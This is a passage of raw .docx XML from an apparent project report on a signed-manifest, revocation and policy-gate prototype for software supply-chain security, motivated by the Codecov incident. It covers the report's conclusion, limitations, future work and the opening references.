            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Yes: SLSA-style provenance, approved repository</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Automatic enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CI gate with exit codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Evidence and visibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SQLite audit log and dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.2 Novel Elements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Continuous Software Supply-Chain Security Gate:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> build → hash → provenance → sign → publish → verify (CRL → policy → signature → digest → provenance) → deploy or block, enforced automatically with no manual checksum step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Two-sided revocation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the signer refuses to use a revoked key, and every verifier rejects manifests from it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Zero-trust admission policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that combines cryptographic checks with organisational rules: approved signer, key, version floor, revoked versions, approved source repository and build-test status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Observability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> every decision is stored and visualised, turning silent failures like the two-month Codecov gap into visible events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.3 Industry Alignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The design follows the direction the industry took after Codecov and SolarWinds. US Executive Order 14028 (May 2021) [12] required secure development practices and provenance for software sold to the US government. NIST's Secure Software Development Framework (SP 800-218) [9] recommends cryptographically protecting releases and archiving provenance. The OpenSSF SLSA framework [10] defines the provenance format our builder follows. Signing ecosystems such as Sigstore [14] and The Update Framework's key-compromise resilience [15] target the same problem at scale. Our prototype's building blocks (signed manifest, revocation, policy gate) map directly onto these tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.4 Cost and Feasibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Software cost:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> zero; all components are open source (Python, PyCA cryptography, SQLite, Flask).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Runtime cost:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> milliseconds per verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Operational cost:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> one signing key in a cloud KMS or HSM, a key-rotation procedure, and one gate step per customer pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adoption:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> customers add a single command before running a vendor tool. Vendors add a signing step to their release job.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.5 Relevance to Other Incidents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The mechanism applies wherever distributed code can be altered after release, such as compromised mirrors, CDN-hosted install scripts and self-updating agents. Its boundary should be stated honestly. When malicious code is inserted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> signing, as in SolarWinds (2020) [13], a signature alone cannot help. Our build provenance and security-test flag are the first step towards addressing that case.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 9</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Codecov incident showed that one leaked storage credential, combined with customers executing an unverified script inside privileged CI environments, can expose secrets across many organisations for months, even when every download uses HTTPS. The root problem was the absence of mandatory, automatic verification of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> integrity and authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Our Cryptographically Verified Software Supply Chain closes that gap. The vendor signs a canonical release manifest carrying the artifact's SHA-256 digest with Ed25519, and records SLSA-style provenance. The customer's security gate checks revocation, admission policy, signature, digest and provenance before anything runs, and it blocks and logs every violation. All nine required test cases passed, every simulated attack was blocked with zero false acceptances, and verification costs about 1.89 ms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>9.1 Limitations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A leaked key remains usable until it is revoked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The CRL, trusted keystore and policy are local, unsigned files; in production they should be signed by a vendor root key and distributed with freshness guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The provenance file is referenced by name, but its digest is not inside the signed manifest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prototype private keys are stored as unencrypted PEM files, rather than in an HSM or cloud KMS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key rotation adds the old key to the CRL, so releases signed with the old key are also rejected; a separate "retired" status would keep older releases valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The audit log is a normal SQLite table: it records every event, but it is not cryptographically tamper-evident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Distribution is simulated with a local folder; TLS 1.3 is part of the deployment design rather than the prototype.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>9.2 Future Work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Put the provenance SHA-256 inside the signed manifest, and sign the CRL and trust store with a vendor root key (TUF-style).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Move signing into a cloud KMS or HSM, and add RBAC plus MFA to the signing service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hash-chain the audit log or publish signatures to a transparency log (Sigstore Rekor).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Add a real HTTPS (TLS 1.3) artifact registry and package the gate as a reusable GitHub Action.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adopt threshold (m-of-n) release signing and SBOM verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 10</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[1]  Codecov, "Bash Uploader Security Update," Apr. 15, 2021 (updated). [Online]. Available: https://about.codecov.io/security-update/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[2]  J. Menn and R. Satter, "Codecov hackers breached hundreds of restricted customer sites - sources," Reuters, Apr. 19, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[3]  HashiCorp, "HCSEC-2021-12 - Codecov Security Event and HashiCorp GPG Key Exposure," HashiCorp Discuss security bulletin, Apr. 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[4]  National Institute of Standards and Technology, "Secure Hash Standard (SHS)," FIPS PUB 180-4, Aug. 2015.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
